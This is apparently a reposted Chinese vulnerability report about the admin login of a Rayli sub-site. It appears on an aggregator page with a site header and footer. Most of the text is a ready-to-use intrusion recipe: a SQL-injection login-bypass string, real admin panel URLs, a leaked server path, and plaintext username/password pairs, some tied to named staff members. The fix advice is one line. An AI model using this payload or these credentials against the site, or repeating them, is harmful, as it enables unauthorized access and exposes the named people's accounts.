/data/www/wwwroot/lifestyle/ http://lifestyle.rayli.com.cn/manager/login.php ...">

瑞麗 分站后臺(tái)驗(yàn)證繞過(guò)+SQL注入+路徑泄漏 -電腦資料

電腦資料 時(shí)間:2019-01-01 我要投稿
【m.clearvueentertainment.com - 電腦資料】

   

    瑞麗 分站后臺(tái)弱口令+SQL注入,不是廢棄的

    用'or''=''or''='嘗試登錄后帳號(hào)密碼自己就跳出來(lái)了

    http://lifestyle.rayli.com.cn/manager/index.php->/data/www/wwwroot/lifestyle/

    http://lifestyle.rayli.com.cn/manager/login.php

    admin admin

    liulongjun liulongjun@rayli

    zengyujie zengyujie@rayli

    http://video.rayli.com.cn/ec/

    admin admin

    漏洞證明

    修復(fù)方案:

    改密碼,過(guò)濾參數(shù)...

    作者 zhk

最新文章